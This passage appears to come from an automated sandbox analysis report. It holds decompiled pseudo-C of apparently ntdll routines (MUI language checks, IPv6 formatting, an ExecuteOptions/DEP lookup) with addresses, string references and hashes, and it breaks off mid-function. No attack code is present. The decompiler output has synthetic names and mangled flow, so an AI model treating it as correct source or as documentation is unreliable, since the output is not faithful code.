                                                                                                                                                    						}
                                                                                                                                                    						if(_v8 != _t318) {
                                                                                                                                                    							E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    						}
                                                                                                                                                    						_v8 = _t318;
                                                                                                                                                    						goto L30;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				_t284 = _v24;
                                                                                                                                                    				_t322 = _t284 + 4;
                                                                                                                                                    				_push(_t284);
                                                                                                                                                    				_v48 = _t322;
                                                                                                                                                    				E0204718A(_t284);
                                                                                                                                                    				_t339 = _t335 + 4;
                                                                                                                                                    				if(_t322 == _t318) {
                                                                                                                                                    					_v28 = _t318;
                                                                                                                                                    				} else {
                                                                                                                                                    					_v28 = E0202E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                    				}
                                                                                                                                                    				if(_v28 == _t318) {
                                                                                                                                                    					_v48 = _t318;
                                                                                                                                                    					goto L58;
                                                                                                                                                    				} else {
                                                                                                                                                    					E02022340(_v28, _v8, _v24);
                                                                                                                                                    					_v16 = _v28;
                                                                                                                                                    					_a4 = _t318;
                                                                                                                                                    					_t288 = E0203E679(_v28, _t332);
                                                                                                                                                    					_t335 = _t339 + 0x14;
                                                                                                                                                    					while(1) {
                                                                                                                                                    						_v12 = _t288;
                                                                                                                                                    						if(_t288 == _t318) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						_v12 = _v12 + 2;
                                                                                                                                                    						 *_v12 = 0;
                                                                                                                                                    						E0202E2A8(_v12,  &_v68, _v16);
                                                                                                                                                    						if(E02045553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    							_a4 = _a4 + 1;
                                                                                                                                                    						}
                                                                                                                                                    						_v16 = _v12;
                                                                                                                                                    						_t288 = E0203E679(_v12, _t332);
                                                                                                                                                    						_pop(_t322);
                                                                                                                                                    					}
                                                                                                                                                    					_t296 = _v16;
                                                                                                                                                    					if( *_v16 != _t318) {
                                                                                                                                                    						E0202E2A8(_t322,  &_v68, _t296);
                                                                                                                                                    						if(E02045553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    							_a4 = _a4 + 1;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					if(_a4 == _t318) {
                                                                                                                                                    						E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                    						_v48 = _t318;
                                                                                                                                                    						_v28 = _t318;
                                                                                                                                                    					}
                                                                                                                                                    					if(_v8 != _t318) {
                                                                                                                                                    						E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    					}
                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                    					goto L17;
                                                                                                                                                    				}
                                                                                                                                                    			}





































                                                                                                                                                    0x02048ad8
                                                                                                                                                    0x02048aeb
                                                                                                                                                    0x02048aeb
                                                                                                                                                    0x02048af0
                                                                                                                                                    0x02048af4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02048af4
                                                                                                                                                    0x02048a42
                                                                                                                                                    0x02048926
                                                                                                                                                    0x02048929
                                                                                                                                                    0x0204892c
                                                                                                                                                    0x0204892d
                                                                                                                                                    0x02048930
                                                                                                                                                    0x02048935
                                                                                                                                                    0x0204893a
                                                                                                                                                    0x02048b51
                                                                                                                                                    0x02048940
                                                                                                                                                    0x02048954
                                                                                                                                                    0x02048954
                                                                                                                                                    0x0204895a
                                                                                                                                                    0x02091b63
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02048960
                                                                                                                                                    0x02048969
                                                                                                                                                    0x02048973
                                                                                                                                                    0x02048976
                                                                                                                                                    0x02048979
                                                                                                                                                    0x0204897e
                                                                                                                                                    0x02048981
                                                                                                                                                    0x02048981
                                                                                                                                                    0x02048986
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02091b6e
                                                                                                                                                    0x02091b74
                                                                                                                                                    0x02091b7b
                                                                                                                                                    0x02091b8f
                                                                                                                                                    0x02091b91
                                                                                                                                                    0x02091b91
                                                                                                                                                    0x02091b99
                                                                                                                                                    0x02091b9c
                                                                                                                                                    0x02091ba2
                                                                                                                                                    0x02091ba2
                                                                                                                                                    0x0204898c
                                                                                                                                                    0x02048992
                                                                                                                                                    0x02048999
                                                                                                                                                    0x020489ad
                                                                                                                                                    0x02091ba8
                                                                                                                                                    0x02091ba8
                                                                                                                                                    0x020489ad
                                                                                                                                                    0x020489b6
                                                                                                                                                    0x020489c8
                                                                                                                                                    0x020489cd
                                                                                                                                                    0x020489d0
                                                                                                                                                    0x020489d0
                                                                                                                                                    0x020489d6
                                                                                                                                                    0x020489e8
                                                                                                                                                    0x020489e8
                                                                                                                                                    0x020489ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020489ed
                                                                                                                                                    0x0204895a
                                                                                                                                                    0x0204883e
                                                                                                                                                    0x02048841
                                                                                                                                                    0x02048844
                                                                                                                                                    0x02048845
                                                                                                                                                    0x02048848
                                                                                                                                                    0x0204884d
                                                                                                                                                    0x02048852
                                                                                                                                                    0x02048b49
                                                                                                                                                    0x02048858
                                                                                                                                                    0x0204886c
                                                                                                                                                    0x0204886c
                                                                                                                                                    0x02048872
                                                                                                                                                    0x02091b0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02048878
                                                                                                                                                    0x02048881
                                                                                                                                                    0x0204888b
                                                                                                                                                    0x0204888e
                                                                                                                                                    0x02048891
                                                                                                                                                    0x02048896
                                                                                                                                                    0x02048899
                                                                                                                                                    0x02048899
                                                                                                                                                    0x0204889e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02091b21
                                                                                                                                                    0x02091b27
                                                                                                                                                    0x02091b2e
                                                                                                                                                    0x02091b42
                                                                                                                                                    0x02091b44
                                                                                                                                                    0x02091b44
                                                                                                                                                    0x02091b4c
                                                                                                                                                    0x02091b4f
                                                                                                                                                    0x02091b55
                                                                                                                                                    0x02091b55
                                                                                                                                                    0x020488a4
                                                                                                                                                    0x020488aa
                                                                                                                                                    0x020488b1
                                                                                                                                                    0x020488c5
                                                                                                                                                    0x02091b5b
                                                                                                                                                    0x02091b5b
                                                                                                                                                    0x020488c5
                                                                                                                                                    0x020488ce
                                                                                                                                                    0x020488e0
                                                                                                                                                    0x020488e5
                                                                                                                                                    0x020488e8
                                                                                                                                                    0x020488e8
                                                                                                                                                    0x020488ee
                                                                                                                                                    0x02048900
                                                                                                                                                    0x02048900
                                                                                                                                                    0x02048905
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02048905

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 02048914
                                                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 020487E6
                                                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 020489FC
                                                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 02048827
                                                                                                                                                    • WindowsExcludedProcs, xrefs: 020487C1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcspbrk
                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                    • API String ID: 402402107-258546922
                                                                                                                                                    • Opcode ID: cfb77aa8b608c4e9e6c60f3ef62f3e9edc8c254b15a2d9201f4131170d9a16a4
                                                                                                                                                    • Instruction ID: 0a1d04ae538adddae67da9514051c95a4736a86866b952d7da35eb3596d0c228
                                                                                                                                                    • Opcode Fuzzy Hash: cfb77aa8b608c4e9e6c60f3ef62f3e9edc8c254b15a2d9201f4131170d9a16a4
                                                                                                                                                    • Instruction Fuzzy Hash: 2EF1C6B1D00319EFDF51EF99C9849EEB7B9BF08304F14846AE505A7210EB34AA45EF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                    			E020613CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                    				char _v8;
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				intOrPtr* _v16;
                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                    				char _v24;
                                                                                                                                                    				intOrPtr _t71;
                                                                                                                                                    				signed int _t78;
                                                                                                                                                    				signed int _t86;
                                                                                                                                                    				char _t90;
                                                                                                                                                    				signed int _t91;
                                                                                                                                                    				signed int _t96;
                                                                                                                                                    				intOrPtr _t108;
                                                                                                                                                    				signed int _t114;
                                                                                                                                                    				void* _t115;
                                                                                                                                                    				intOrPtr _t128;
                                                                                                                                                    				intOrPtr* _t129;
                                                                                                                                                    				void* _t130;
                                                                                                                                                    
                                                                                                                                                    				_t129 = _a4;
                                                                                                                                                    				_t128 = _a8;
                                                                                                                                                    				_t116 = 0;
                                                                                                                                                    				_t71 = _t128 + 0x5c;
                                                                                                                                                    				_v8 = 8;
                                                                                                                                                    				_v20 = _t71;
                                                                                                                                                    				if( *_t129 == 0) {
                                                                                                                                                    					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                    						goto L5;
                                                                                                                                                    					} else {
                                                                                                                                                    						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                    						if(_t96 != 0) {
                                                                                                                                                    							L38:
                                                                                                                                                    							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                    								goto L5;
                                                                                                                                                    							} else {
                                                                                                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                    								_t86 = E02057707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                    								L36:
                                                                                                                                                    								return _t128 + _t86 * 2;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                    						if(_t114 == 0) {
                                                                                                                                                    							L33:
                                                                                                                                                    							_t115 = 0x2022926;
                                                                                                                                                    							L35:
                                                                                                                                                    							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                    							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                    							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                    							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                    							_t86 = E02057707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                    							goto L36;
                                                                                                                                                    						}
                                                                                                                                                    						if(_t114 != 0xffff) {
                                                                                                                                                    							_t116 = 0;
                                                                                                                                                    							goto L38;
                                                                                                                                                    						}
                                                                                                                                                    						if(_t114 != 0) {
                                                                                                                                                    							_t115 = 0x2029cac;
                                                                                                                                                    							goto L35;
                                                                                                                                                    						}
                                                                                                                                                    						goto L33;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					L5:
                                                                                                                                                    					_a8 = _t116;
                                                                                                                                                    					_a4 = _t116;
                                                                                                                                                    					_v12 = _t116;
                                                                                                                                                    					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                    						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                    							_v8 = 6;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t90 = _v8;
                                                                                                                                                    					if(_t90 <= _t116) {
                                                                                                                                                    						L11:
                                                                                                                                                    						if(_a8 - _a4 <= 1) {
                                                                                                                                                    							_a8 = _t116;
                                                                                                                                                    							_a4 = _t116;
                                                                                                                                                    						}
                                                                                                                                                    						_t91 = 0;
                                                                                                                                                    						if(_v8 <= _t116) {
                                                                                                                                                    							L22:
                                                                                                                                                    							if(_v8 < 8) {
                                                                                                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                    								_t128 = _t128 + E02057707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                    							}
                                                                                                                                                    							return _t128;
                                                                                                                                                    						} else {
                                                                                                                                                    							L14:
                                                                                                                                                    							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                    								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                    									_push(":");
                                                                                                                                                    									_push(_t71 - _t128 >> 1);
                                                                                                                                                    									_push(_t128);
                                                                                                                                                    									_t128 = _t128 + E02057707() * 2;
                                                                                                                                                    									_t71 = _v20;
                                                                                                                                                    									_t130 = _t130 + 0xc;
                                                                                                                                                    								}
                                                                                                                                                    								_t78 = E02057707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                    								_t130 = _t130 + 0x10;
                                                                                                                                                    							} else {
                                                                                                                                                    								_push(L"::");
                                                                                                                                                    								_push(_t71 - _t128 >> 1);
                                                                                                                                                    								_push(_t128);
                                                                                                                                                    								_t78 = E02057707();
                                                                                                                                                    								_t130 = _t130 + 0xc;
                                                                                                                                                    								_t91 = _a8 - 1;
                                                                                                                                                    							}
                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                    							_t128 = _t128 + _t78 * 2;
                                                                                                                                                    							_t71 = _v20;
                                                                                                                                                    							if(_t91 >= _v8) {
                                                                                                                                                    								goto L22;
                                                                                                                                                    							}
                                                                                                                                                    							_t116 = 0;
                                                                                                                                                    							goto L14;
                                                                                                                                                    						}
                                                                                                                                                    					} else {
                                                                                                                                                    						_t108 = 1;
                                                                                                                                                    						_v16 = _t129;
                                                                                                                                                    						_v24 = _t90;
                                                                                                                                                    						do {
                                                                                                                                                    							if( *_v16 == _t116) {
                                                                                                                                                    								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                    									_a4 = _v12;
                                                                                                                                                    									_a8 = _t108;
                                                                                                                                                    								}
                                                                                                                                                    								_t116 = 0;
                                                                                                                                                    							} else {
                                                                                                                                                    								_v12 = _t108;
                                                                                                                                                    							}
                                                                                                                                                    							_v16 = _v16 + 2;
                                                                                                                                                    							_t108 = _t108 + 1;
                                                                                                                                                    							_t26 =  &_v24;
                                                                                                                                                    							 *_t26 = _v24 - 1;
                                                                                                                                                    						} while ( *_t26 != 0);
                                                                                                                                                    						goto L11;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    			}




















                                                                                                                                                    0x020613a4
                                                                                                                                                    0x02061498
                                                                                                                                                    0x0206149c
                                                                                                                                                    0x0206149f
                                                                                                                                                    0x020614a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020614a4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020614a4
                                                                                                                                                    0x02061413
                                                                                                                                                    0x02061415
                                                                                                                                                    0x02061416
                                                                                                                                                    0x02061419
                                                                                                                                                    0x0206141c
                                                                                                                                                    0x02061422
                                                                                                                                                    0x020613b7
                                                                                                                                                    0x020613bc
                                                                                                                                                    0x020613bf
                                                                                                                                                    0x020613bf
                                                                                                                                                    0x020613c2
                                                                                                                                                    0x02061424
                                                                                                                                                    0x02061424
                                                                                                                                                    0x02061424
                                                                                                                                                    0x02061427
                                                                                                                                                    0x0206142b
                                                                                                                                                    0x0206142c
                                                                                                                                                    0x0206142c
                                                                                                                                                    0x0206142c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0206141c
                                                                                                                                                    0x02061411

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                    • Opcode ID: 422f95ff58d7fb8ae0441e1243e7a8fba018922f0f282ec653285039f5ed58fc
                                                                                                                                                    • Instruction ID: bb3dcc8298e981899e0c27c56081247d976a1d9b3a5d19b11983939a6f79ade8
                                                                                                                                                    • Opcode Fuzzy Hash: 422f95ff58d7fb8ae0441e1243e7a8fba018922f0f282ec653285039f5ed58fc
                                                                                                                                                    • Instruction Fuzzy Hash: 0461F371D00765AADB25DF59C8849BFBBF6EF84300B18C16EE4DA47A40D774A640FB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                    			E02057EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				char _v540;
                                                                                                                                                    				unsigned int _v544;
                                                                                                                                                    				signed int _v548;
                                                                                                                                                    				intOrPtr _v552;
                                                                                                                                                    				char _v556;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int _t33;
                                                                                                                                                    				void* _t38;
                                                                                                                                                    				unsigned int _t46;
                                                                                                                                                    				unsigned int _t47;
                                                                                                                                                    				unsigned int _t52;
                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                    				unsigned int _t62;
                                                                                                                                                    				void* _t69;
                                                                                                                                                    				void* _t70;
                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                    				signed int _t73;
                                                                                                                                                    				void* _t74;
                                                                                                                                                    				void* _t75;
                                                                                                                                                    				void* _t76;
                                                                                                                                                    				void* _t77;
                                                                                                                                                    
                                                                                                                                                    				_t33 =  *0x2102088; // 0x764d65b9
                                                                                                                                                    				_v8 = _t33 ^ _t73;
                                                                                                                                                    				_v548 = _v548 & 0x00000000;
                                                                                                                                                    				_t72 = _a4;
                                                                                                                                                    				if(E02057F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                    					__eflags = _v548;
                                                                                                                                                    					if(_v548 == 0) {
                                                                                                                                                    						goto L1;
                                                                                                                                                    					}
                                                                                                                                                    					_t62 = _t72 + 0x24;
                                                                                                                                                    					E02073F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                    					_t71 = 0x214;
                                                                                                                                                    					_v544 = 0x214;
                                                                                                                                                    					E0202DFC0( &_v540, 0, 0x214);
                                                                                                                                                    					_t75 = _t74 + 0x20;
                                                                                                                                                    					_t46 =  *0x2104218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                    					__eflags = _t46;
                                                                                                                                                    					if(_t46 == 0) {
                                                                                                                                                    						goto L1;
                                                                                                                                                    					}
                                                                                                                                                    					_t47 = _v544;
                                                                                                                                                    					__eflags = _t47;
                                                                                                                                                    					if(_t47 == 0) {
                                                                                                                                                    						goto L1;
                                                                                                                                                    					}
                                                                                                                                                    					__eflags = _t47 - 0x214;
                                                                                                                                                    					if(_t47 >= 0x214) {
                                                                                                                                                    						goto L1;
                                                                                                                                                    					}
                                                                                                                                                    					_push(_t62);
                                                                                                                                                    					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                    					E02073F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                    					_t52 = E02030D27( &_v540, L"Execute=1");
                                                                                                                                                    					_t76 = _t75 + 0x1c;
                                                                                                                                                    					_push(_t62);
                                                                                                                                                    					__eflags = _t52;
                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                    						E02073F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                    						_t71 =  &_v540;
                                                                                                                                                    						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                    						_t77 = _t76 + 0x14;
                                                                                                                                                    						_v552 = _t56;
                                                                                                                                                    						__eflags = _t71 - _t56;
                                                                                                                                                    						if(_t71 >= _t56) {
                                                                                                                                                    							goto L1;
                                                                                                                                                    						} else {
                                                                                                                                                    							goto L10;
                                                                                                                                                    						}
                                                                                                                                                    						while(1) {
                                                                                                                                                    							L10:
                                                                                                                                                    							_t62 = E02038375(_t71, 0x20);
                                                                                                                                                    							_pop(_t69);
                                                                                                                                                    							__eflags = _t62;
                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                    								__eflags = 0;
                                                                                                                                                    								 *_t62 = 0;
                                                                                                                                                    							}
                                                                                                                                                    							E02073F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                    							_t77 = _t77 + 0x10;
                                                                                                                                                    							E0209E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                    							__eflags = _t62;
                                                                                                                                                    							if(_t62 == 0) {
                                                                                                                                                    								goto L1;
                                                                                                                                                    							}
                                                                                                                                                    							_t31 = _t62 + 2; // 0x2
                                                                                                                                                    							_t71 = _t31;
                                                                                                                                                    							__eflags = _t71 - _v552;
                                                                                                                                                    							if(_t71 >= _v552) {
                                                                                                                                                    								goto L1;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                    					_push(3);
                                                                                                                                                    					_push(0x55);
                                                                                                                                                    					E02073F92();
                                                                                                                                                    					_t38 = 1;
                                                                                                                                                    					L2:
                                                                                                                                                    					return E0202E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                    				}
                                                                                                                                                    				L1:
                                                                                                                                                    				_t38 = 0;
                                                                                                                                                    				goto L2;
                                                                                                                                                    			}




























                                                                                                                                                    APIs
                                                                                                                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02073F12
                                                                                                                                                    Strings
                                                                                                                                                    • Execute=1, xrefs: 02073F5E
                                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02073F75
                                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02073F4A
                                                                                                                                                    • ExecuteOptions, xrefs: 02073F04
                                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0207E2FB
                                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02073EC4
                                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0207E345
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BaseDataModuleQuery
                                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                    • API String ID: 3901378454-484625025
                                                                                                                                                    • Opcode ID: f100b9f95a647f4b068791b412ef9f0bb2fa2eb5b19c43e5a65ffde01c6fa247
                                                                                                                                                    • Instruction ID: 86ecf0a5442cf08af1024848a7bf6a3681d0435d1f5377384c5007141d46aab4
                                                                                                                                                    • Opcode Fuzzy Hash: f100b9f95a647f4b068791b412ef9f0bb2fa2eb5b19c43e5a65ffde01c6fa247
                                                                                                                                                    • Instruction Fuzzy Hash: 5741A971A8032C7EEB21DA94DCC9FDBB3BDAB14704F0004A9A505E6190E770AA45BF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E02060B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				signed int _v12;
                                                                                                                                                    				signed int _v16;
                                                                                                                                                    				signed int _v20;
                                                                                                                                                    				signed int _v24;
                                                                                                                                                    				signed int _v28;
                                                                                                                                                    				signed int _v32;
                                                                                                                                                    				void* _t108;
                                                                                                                                                    				void* _t116;
                                                                                                                                                    				char _t120;
                                                                                                                                                    				short _t121;
                                                                                                                                                    				void* _t128;
                                                                                                                                                    				intOrPtr* _t130;
                                                                                                                                                    				char _t132;
                                                                                                                                                    				short _t133;
                                                                                                                                                    				intOrPtr _t141;
                                                                                                                                                    				signed int _t156;
                                                                                                                                                    				signed int _t174;
                                                                                                                                                    				intOrPtr _t177;
                                                                                                                                                    				intOrPtr* _t179;
                                                                                                                                                    				intOrPtr _t180;
                                                                                                                                                    				void* _t183;
                                                                                                                                                    
                                                                                                                                                    				_t179 = _a4;
                                                                                                                                                    				_t141 =  *_t179;
                                                                                                                                                    				_v16 = 0;
                                                                                                                                                    				_v28 = 0;
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				_v24 = 0;
                                                                                                                                                    				_v12 = 0;
                                                                                                                                                    				_v32 = 0;
                                                                                                                                                    				_v20 = 0;
                                                                                                                                                    				if(_t141 == 0) {
                                                                                                                                                    					L41:
                                                                                                                                                    					 *_a8 = _t179;
                                                                                                                                                    					_t180 = _v24;
                                                                                                                                                    					if(_t180 != 0) {
                                                                                                                                                    						if(_t180 != 3) {
                                                                                                                                                    							goto L6;
                                                                                                                                                    						}
                                                                                                                                                    						_v8 = _v8 + 1;
                                                                                                                                                    					}
                                                                                                                                                    					_t174 = _v32;
                                                                                                                                                    					if(_t174 == 0) {
                                                                                                                                                    						if(_v8 == 7) {
                                                                                                                                                    							goto L43;
                                                                                                                                                    						}
                                                                                                                                                    						goto L6;
                                                                                                                                                    					}
                                                                                                                                                    					L43:
                                                                                                                                                    					if(_v16 != 1) {
                                                                                                                                                    						if(_v16 != 2) {
                                                                                                                                                    							goto L6;
                                                                                                                                                    						}
                                                                                                                                                    						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                    						L47:
                                                                                                                                                    						if(_t174 != 0) {
                                                                                                                                                    							E02038980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                    							_t116 = 8;
                                                                                                                                                    							E0202DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                    						}
                                                                                                                                                    						return 0;
                                                                                                                                                    					}
